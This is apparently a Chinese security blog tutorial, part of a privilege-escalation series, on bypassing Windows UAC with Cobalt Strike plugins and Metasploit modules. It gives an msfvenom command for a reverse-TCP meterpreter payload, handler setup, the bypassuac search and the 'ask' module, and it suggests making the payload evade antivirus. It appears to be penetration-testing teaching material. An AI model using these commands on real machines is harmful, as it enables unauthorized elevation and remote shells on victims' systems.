当前位置: 首页 > news >正文

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

系列文章

操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

MSF和CS绕过UAC提权

CS绕过UAC提权

拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC

在这里插入图片描述

执行添加用户的命令时显示拒绝访问

在这里插入图片描述
使用CS自带的插件进行绕过提权

在这里插入图片描述
直接提到了system权限

在这里插入图片描述
在这里插入图片描述

提权后可以完成添加用户的命令

在这里插入图片描述

MSF绕过UAC

bypassuac模块

使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置

生成一个MSF的SHELL

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f exe -o test.exe 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 3333
exploit

在这里插入图片描述

getuid

在这里插入图片描述

试一下getsystem发现失败

在这里插入图片描述

msf搜索 bypassuac 得到很多模块

search bypassuac

在这里插入图片描述

使用一个模块试一试

在这里插入图片描述

RUNAS模块绕过UAC

该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell

这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可

use exploit/windows/local/ask

在这里插入图片描述

用户点击后直接获取高权限

在这里插入图片描述

http://www.lryc.cn/news/21152.html

相关文章:

  • 快速排序+快速定位
  • nginx http rewrite module 详解
  • 机器学习可解释性一(LIME)
  • CV学习笔记-MobileNet
  • C++进阶——继承
  • 数据结构---单链表
  • redis数据结构的底层实现
  • 【JavaSE】复习(进阶)
  • Java 主流日志工具库
  • 产品经理有必要考个 PMP吗?(含PMP资料)
  • 什么是原型、原型链?原型和原型链的作用
  • 条件期望4
  • 网络协议分析(2)判断两个ip数据包是不是同一个数据包分片
  • 6.2 负反馈放大电路的四种基本组态
  • MySQL进阶之锁
  • 【Mac 教程系列】如何在 Mac 上破解带有密码的 ZIP 压缩文件 ?
  • 【Acwing 周赛复盘】第92场周赛复盘(2023.2.25)
  • L1-087 机工士姆斯塔迪奥
  • 本周大新闻|索尼PS VR2立项近7年;传腾讯将引进Quest 2
  • aws console 使用fargate部署aws服务快速跳转前端搜索栏
  • Redis实战之Redisson使用技巧详解
  • SQLAlchemy
  • 【Linux学习笔记】8.Linux yum 命令和apt 命令
  • windows服务器实用(4)——使用IIS部署网站
  • Random(二)什么是伪共享?@sun.misc.Contended注解
  • Linux解压压缩
  • JavaSe第3次笔记
  • 非人工智能专业怎样从零开始学人工智能?
  • MyBatis之增、删、查、改
  • 死磕Spring,什么是SPI机制,对SpringBoot自动装配有什么帮助